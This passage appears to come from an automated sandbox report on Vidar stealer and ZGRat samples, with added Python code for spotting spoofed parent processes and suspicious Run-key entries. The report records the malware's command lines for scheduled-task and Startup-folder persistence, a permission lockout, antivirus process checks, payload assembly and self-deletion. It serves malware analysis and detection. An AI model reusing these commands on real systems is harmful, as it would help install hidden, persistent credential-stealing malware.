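    {"creator_pid": 900, "creator_image": r"C:\Windows\System32\svchost.exe",
     "parent_pid": 3820, "new_pid": 4130, "image": r"C:\Windows\System32\mmc.exe"},
]

# Creators that re-parent by design. An assumption to tune per environment,
# not a complete list; keying on full path stops a renamed copy in Temp matching.
TRUSTED_REPARENTERS = {r"c:\windows\system32\svchost.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")


def detect_spoofed_parents(events, trusted=TRUSTED_REPARENTERS) -> list:
    """Every creation whose caller is not the parent it recorded."""
    findings = []
    for e in events:
        if e["creator_pid"] == e["parent_pid"]:
            continue  # ordinary creation: caller and recorded parent agree
        creator = e["creator_image"].lower()
        findings.append({
            "new_pid": e["new_pid"],
            "image": e["image"],
            "claimed_parent": e["parent_pid"],
            "actual_creator": e["creator_pid"],
            "creator_image": e["creator_image"],
            "trusted_creator": creator in trusted,
            "creator_in_user_dir": any(p in creator for p in USER_WRITABLE),
        })
    return findings


def alerts(events, trusted=TRUSTED_REPARENTERS) -> list:
    """Findings that survive the allowlist; creators in user-writable paths first."""
    out = [f for f in detect_spoofed_parents(events, trusted) if not f["trusted_creator"]]
    return sorted(out, key=lambda f: not f["creator_in_user_dir"])


def true_lineage(events, pid: int) -> list:
    """Walk creators, not recorded parents, back from pid. Stops at the first
    PID with no start event in the set (a pre-existing process)."""
    by_pid = {e["new_pid"]: e for e in events}
    chain = [pid]
    while pid in by_pid:
        pid = by_pid[pid]["creator_pid"]
        chain.append(pid)
    return chain
```

The sandbox sees both PIDs because it hooks the syscall; on a live host the same two values are available from the kernel process provider (creator in the event header, parent in the payload), and a process tree that is built from the parent field alone is exactly the view this technique is designed to fool.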

Vidar

stealer vidar

ZGRat

rat zgrat

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url C:\Windows\SYSTEM32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url C:\Windows\SYSTEM32\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-682446400-748730298-2471801445-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ea10023c-c3fb-47cc-92b7-f6d1ae94c05a\\FD24.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\FD24.exe N/A
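The Run value above stores the command `"C:\Users\Admin\AppData\Local\ea10023c-c3fb-47cc-92b7-f6d1ae94c05a\FD24.exe" --AutoStart` under a name (SysHelper) that has nothing to do with the image it launches. Several weak signals combine here: a user-writable location, a GUID-named directory, a short hex filename, and a value name unrelated to the image. The triage function below, added as an example and not taken from the report, parses such a value into image and arguments (the quoted-path form shown above, which generic shell splitting gets wrong) and counts those signals, requiring more than one before it flags the entry; a single signal would also match legitimate per-user software that installs under AppData\Local. The heuristics and the threshold of two are assumptions for illustration, and the benign OneDrive entry used for contrast is constructed.

```python
"""Triage a Run-key autostart value into image, arguments and a list of reasons
it looks like malware persistence rather than installed software."""
import re
from dataclasses import dataclass

# The value recorded above (unescaped), and a constructed benign entry.
SYSHELPER_VALUE = r'"C:\Users\Admin\AppData\Local\ea10023c-c3fb-47cc-92b7-f6d1ae94c05a\FD24.exe" --AutoStart'
ONEDRIVE_VALUE = r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'

# Heuristics chosen for this example, not a published ruleset.
GUID_DIR = re.compile(r"\\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\", re.I)
SHORT_HEX_NAME = re.compile(r"\\[0-9a-f]{4}\.exe$", re.I)   # temp-style names such as FD24.exe
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\temp\\", "\\users\\public\\")
MIN_REASONS = 2


@dataclass
class AutorunFinding:
    value_name: str
    image: str
    args: list
    reasons: list

    @property
    def suspicious(self) -> bool:
        return len(self.reasons) >= MIN_REASONS


def split_command(command: str):
    """Split a Windows command string into (image, args). A leading quoted
    path is taken whole; otherwise the image ends at the first space."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        if end == -1:
            raise ValueError("unterminated quote in command")
        image, rest = command[1:end], command[end + 1:]
    else:
        image, _, rest = command.partition(" ")
    return image, rest.split()


def triage_run_value(value_name: str, command: str) -> AutorunFinding:
    image, args = split_command(command)
    low = image.lower()
    reasons = []
    if any(p in low for p in USER_WRITABLE):
        reasons.append("image in user-writable directory")
    if GUID_DIR.search(image):
        reasons.append("GUID-named directory")
    if SHORT_HEX_NAME.search(image):
        reasons.append("short hex image name")
    if value_name.lower() not in low:
        reasons.append("value name unrelated to image")
    if "--autostart" in (a.lower() for a in args):
        reasons.append("--AutoStart argument")
    return AutorunFinding(value_name, image, args, reasons)
```

The same parser applies to the scheduled-task and Startup-folder entries the report lists for this run, since those also store a command string; what changes is only where the string is read from.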

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\bbtsjjr N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\bbtsjjr N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\bbtsjjr N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-682446400-748730298-2471801445-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance C:\Windows\Explorer.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8D5B.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\25500\Http.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3820 wrote to memory of 5088 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 5088 wrote to memory of 2924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3820 wrote to memory of 4624 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4624 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 1500 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Windows\SysWOW64\icacls.exe
PID 1500 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 4708 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\Temp\FD24.exe
PID 3820 wrote to memory of 3216 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\EE8.exe
PID 3216 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3216 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\EE8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3240 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 4368 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe
PID 3240 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\FD24.exe C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe

"C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C25C.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\FD24.exe

C:\Users\Admin\AppData\Local\Temp\FD24.exe

C:\Users\Admin\AppData\Local\Temp\FD24.exe

C:\Users\Admin\AppData\Local\Temp\FD24.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\ea10023c-c3fb-47cc-92b7-f6d1ae94c05a" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\FD24.exe

"C:\Users\Admin\AppData\Local\Temp\FD24.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\FD24.exe

"C:\Users\Admin\AppData\Local\Temp\FD24.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\EE8.exe

C:\Users\Admin\AppData\Local\Temp\EE8.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 1172

C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe

"C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe"

C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe

"C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build2.exe"

C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe

"C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1472

C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe

"C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\761A.exe

C:\Users\Admin\AppData\Local\Temp\761A.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\78DA.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 1032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 944

C:\Users\Admin\AppData\Local\Temp\8EF3.exe

C:\Users\Admin\AppData\Local\Temp\8EF3.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Local\Temp\C69E.exe

C:\Users\Admin\AppData\Local\Temp\C69E.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Users\Admin\AppData\Local\Temp\82FA.exe

C:\Users\Admin\AppData\Local\Temp\82FA.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k move Jeffrey Jeffrey.bat & Jeffrey.bat & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Users\Admin\AppData\Local\Temp\8D5B.exe

C:\Users\Admin\AppData\Local\Temp\8D5B.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 25500

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Sitemap + Sublimedirectory + Cow + Rss + Josh 25500\Http.pif

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Cdt + Thumbnail + Powers + Tamil + Capabilities + Novel + Cos + Breach + Canal + Hobby + Debut + Patricia + Neural + Translations + Fist + Able + Warner + Shapes + Ancient + Plans + Greg + Go + Drain + Mpeg + Necessary + Robertson + Islam + Generations + Trim + Around + Companion + Maiden + Kills + Eat + Brunswick + Ww + Determines + Login + Heads + Wv + Vampire + Consequence + Tba 25500\F

C:\Users\Admin\AppData\Local\Temp\25500\Http.pif

25500\Http.pif 25500\F

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SYSTEM32\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & echo URL="C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & exit

C:\Windows\SYSTEM32\cmd.exe

cmd /c schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F

C:\Users\Admin\AppData\Local\Temp\25500\Http.pif

C:\Users\Admin\AppData\Local\Temp\25500\Http.pif

C:\Windows\system32\svchost.exe

svchost.exe

C:\Users\Admin\AppData\Roaming\bbtsjjr

C:\Users\Admin\AppData\Roaming\bbtsjjr

Network


Files


memory/1596-79-0x0000000000400000-0x0000000000644000-memory.dmp

memory/3240-92-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3240-91-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3240-89-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe

MD5 4b3fc3105731c7ff3a7e3966416912a2
SHA1 0e792bf25e8795158074fa6bd2ee87ad16675124
SHA256 c0f698bcc4324958848de5d8e1b1bdaed5e01632d8c827a5a95356eb04a2c443
SHA512 6ed5ee0139d9d9a676232a6c5d6e9a8528f880025a11fccf8a1a32a999ae5fac41f993c384fabec788e4e47da714d67f1def0348da6b0f4392e7fc7ff1098c28

memory/3240-99-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe

MD5 a6161b5873cb485d5682d695bcfe8fb7
SHA1 c69abdae75f3c768440840d4bbf3172cf01c9a43
SHA256 da7b9ad5e3af3e35f2a88da7f9c160650498ab11af3e06f83f8c10b14824344c
SHA512 8e5a9ace9e6777cd2d43a7a0c776fd079201d5dbcb3d29840f90cb1b4449aad15d0069d5a322c46ee176bd271eec823c0944b7e081df4db8c4f684bf0166b7f6

memory/3240-102-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1596-104-0x0000000000400000-0x0000000000644000-memory.dmp

memory/3216-105-0x0000000002F70000-0x0000000004F70000-memory.dmp

memory/4924-107-0x0000000000400000-0x000000000044B000-memory.dmp

memory/2768-116-0x0000000000400000-0x0000000000406000-memory.dmp

memory/964-117-0x0000000000930000-0x0000000000934000-memory.dmp

C:\Users\Admin\AppData\Local\19bb983e-7dc4-44c2-8a68-73a0a7ce9d49\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

memory/964-115-0x00000000009D0000-0x0000000000AD0000-memory.dmp

memory/2768-120-0x0000000000400000-0x0000000000406000-memory.dmp

memory/2768-121-0x0000000000400000-0x0000000000406000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\761A.exe

MD5 3a7412932c71ed65c7af014c3253a4b7
SHA1 6f9b88ac3bd8fa3f5bee5c9dd18008ca6332529a
SHA256 b4dc0a7bf346b947bf6afa39b3f8cefddd569eb8d8422a2a16280a3c8fb85b5b
SHA512 18bc7d955605bc60de2fb970ef7bc25b8b9d42128cfff86c293394180b664d2b6460111579946cd8614dae0300d4b325a6a3d97e81ceb9f72ca0f595d80ffd0d

C:\Users\Admin\AppData\Local\Temp\761A.exe

MD5 a02b4c06bf6b043d77c18fadca2de889
SHA1 0f1c3827a3ab02af16a4caad4b27a24f7328bc9f
SHA256 77e5e67fb0c8b2ad95d4737951b1ab8bd322386e12f5a04e2c4c8e871c2b3ca6
SHA512 9a41d4f8968a7c5cf4118be68e7e60169ddc634120d856f18ccc3dc189af25bd782c4b1849f88887fb5698ee2a7f5517e7b6089d505256d2b82150954312ca20

memory/5112-140-0x0000000001210000-0x0000000001EF5000-memory.dmp

memory/5112-149-0x0000000001170000-0x0000000001171000-memory.dmp

memory/5112-152-0x0000000001210000-0x0000000001EF5000-memory.dmp

memory/5112-151-0x00000000011C0000-0x00000000011C1000-memory.dmp

memory/5112-153-0x00000000011D0000-0x00000000011D1000-memory.dmp

memory/5112-150-0x0000000001180000-0x0000000001181000-memory.dmp

memory/5112-154-0x00000000011E0000-0x00000000011E1000-memory.dmp

memory/5112-155-0x00000000011F0000-0x00000000011F1000-memory.dmp

memory/5112-156-0x0000000001210000-0x0000000001EF5000-memory.dmp

memory/5112-158-0x0000000001210000-0x0000000001EF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8EF3.exe

MD5 0bacb0a9109c7e21bbfa27a384796a2c
SHA1 9991c3fb7f6d60280fe5a00551bc52b1952866c4
SHA256 b9845e202a4e89114520fdb7b5970e22bff01759f3e7e3cf8b6f776426deb6e0
SHA512 3b0966adc5af94434601cb3af550746aadeb421c732e8ab405b619565c77ad58c6664a9efa3f40f9214fcd3982b7901b850d85e80a894b0caf8545364d6f880a

C:\Users\Admin\AppData\Local\Temp\8EF3.exe

MD5 fbbbee7c1c9f69c5d4f143c8bfe7a71e
SHA1 0145eb958a648f60ec08ce2aa440b6782b40fa22
SHA256 43947eeface75063096a5a4fdb4e389b7fe2cb348c588e15d9420e9cb6d74849
SHA512 317c342245157bfef7a991d6685967087483c03cbdb7e571af11d600fe82e698a2eec044eb9ded28579b2f9a86a3171d4fed258f15467a61240d133ce193be72

memory/4340-165-0x00007FF691050000-0x00007FF691CB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C69E.exe

MD5 0aa8fc6b64afbcf4353e3ce46c03c6e2
SHA1 015c875d8678460412a90c541610f86ee03a8b29
SHA256 07f7add0eede73fc14dc86cf7a896fb0100138831236ec1de060b26109a1ff9d
SHA512 0b2e4dea6cfca5ecd0d9c2f712d3044babacb0a50278372e93db09126ec4f6a1ec85662604297c1abd3d80b609566344a3cd35ef20a0115b698cea5b1c9cba01

C:\Users\Admin\AppData\Local\Temp\C69E.exe

MD5 704a20d3018a3409d4f64595f87892ca
SHA1 d8b864badcff593097007065a8e6359d107d17ca
SHA256 65bc9a8e9df4268e2c331b5e708d21db028b6946711c4859f860aa24a93c33eb
SHA512 282d4e0ac3541094f04038fe57230b11ae15d0aec9f77827e5e65d0ba5dc2cbb1a8bdb136dd1dec98f22ea6d4c439e179f16ba702b79229bd96efff88a635a00

memory/2088-173-0x0000000071820000-0x0000000071F0E000-memory.dmp

memory/2088-174-0x00000000003C0000-0x0000000000914000-memory.dmp

memory/2088-176-0x0000000005110000-0x0000000005120000-memory.dmp

memory/2088-175-0x00000000051C0000-0x000000000525C000-memory.dmp

memory/2088-177-0x0000000005880000-0x0000000005DAC000-memory.dmp

memory/2088-181-0x0000000071820000-0x0000000071F0E000-memory.dmp

memory/2088-183-0x0000000005110000-0x0000000005120000-memory.dmp

memory/2088-190-0x0000000005530000-0x0000000005542000-memory.dmp

memory/2088-189-0x0000000005DB0000-0x0000000005FEC000-memory.dmp

memory/2088-191-0x0000000007130000-0x00000000072C2000-memory.dmp

\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 500a8ba0f665e21320ceaf2cf973cf6d
SHA1 47548bbead3f002bab430e9b0ee09c2b600442e7
SHA256 a7bcf20ff9536863ef0387200e7518d725ccf45217f114c559f264019f7b760f
SHA512 2f35321e19e770ba6dab04766f41afe934b13e226744d4501c36aa589e5786b942256499ede2ed7ba7dba86fe5faff0a28e551782a6152a60f73fe2e7e98caae

memory/2088-198-0x0000000005570000-0x0000000005580000-memory.dmp

memory/2088-200-0x0000000005110000-0x0000000005120000-memory.dmp

memory/2088-201-0x0000000005110000-0x0000000005120000-memory.dmp

memory/2088-204-0x0000000005110000-0x0000000005120000-memory.dmp

memory/2088-202-0x0000000005110000-0x0000000005120000-memory.dmp

memory/2088-208-0x0000000007640000-0x0000000007740000-memory.dmp

memory/2088-206-0x0000000007640000-0x0000000007740000-memory.dmp

memory/2088-209-0x0000000071820000-0x0000000071F0E000-memory.dmp

memory/4344-212-0x0000000000400000-0x000000000063B000-memory.dmp

memory/2088-197-0x0000000005110000-0x0000000005120000-memory.dmp

memory/2088-199-0x0000000005110000-0x0000000005120000-memory.dmp

memory/4344-257-0x0000000000400000-0x000000000063B000-memory.dmp

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\Users\Admin\AppData\Local\Temp\82FA.exe

MD5 abd30b4e0a7d1af17a87612805d9fab2
SHA1 7326840699fe6cab167853fa4e12c138c457af33
SHA256 26000ba099d2c544a4673d4670fa85fa52fb9a123d6dbe45954d0cfb7e36ebdf
SHA512 9a1862c43063635ed77720b38241fe75b5bb0d41d51e9523dcd4f3be86c4444467c5aff101ae451721365340d8ac1a4e068cabe852d60078ab6c3f6dbec2c08f

C:\Users\Admin\AppData\Local\Temp\82FA.exe

MD5 e1b1a8205e98ad9491e292ae0f05838f
SHA1 7392dd98cbcd665fb76ce484e1a0d25716dba125
SHA256 530193c9e5fd7edb950eec859af74741d6f155126381621ccff958c4ab943ae6
SHA512 4b8b81a9bfe8b46a68fa45c8295068d6daa11ce1be3fb6ce5b1c1ae4082b278ab7901d28668b18ffa05ba6cf4927a1ee42b905991ec2aa6b7e7a61011deb25ae

C:\Users\Admin\AppData\Local\Temp\Jeffrey

MD5 e121db542d18a526f078c32fd2583af5
SHA1 69e677442ccb6d6fe1d2a3029cf44aac473f5f55
SHA256 fcaf08c62c974ca0fb7537213a7867ab0f9fb41e52dde118b758b7ea05f63ca2
SHA512 9d8c2bd284a624b68a2fafd93445648f69ffd47374f1d3cfd1857d2951bbc2a6cbe971fdb5e10d5f513dbb5188d59ee8e5715c86e3a1bf23e6df7feec960bebe

memory/4344-337-0x0000000000400000-0x000000000063B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8D5B.exe

MD5 d88c9297da5b7b0a3f96d33e6eca33e6
SHA1 808e8a222cd131679b4feda2834eaaa92f866143
SHA256 92a59655997ea6a17d871d12965738dfa1649751774129b4fbeea2bb01355723
SHA512 e854cf3f4e4b119e040e00d56adcd56749099ddcb1956433a31156afc88e643972b690917ac09deadb8860e5b6982d55085a372d4f509996ded7e5e3e1f05066

memory/5048-342-0x00000000007A0000-0x000000000080C000-memory.dmp

memory/5048-343-0x0000000071820000-0x0000000071F0E000-memory.dmp

memory/5048-345-0x0000000005240000-0x0000000005250000-memory.dmp

memory/5048-354-0x0000000071820000-0x0000000071F0E000-memory.dmp

memory/5092-355-0x0000000000400000-0x000000000063B000-memory.dmp

memory/5048-353-0x0000000002A60000-0x0000000004A60000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Sublimedirectory

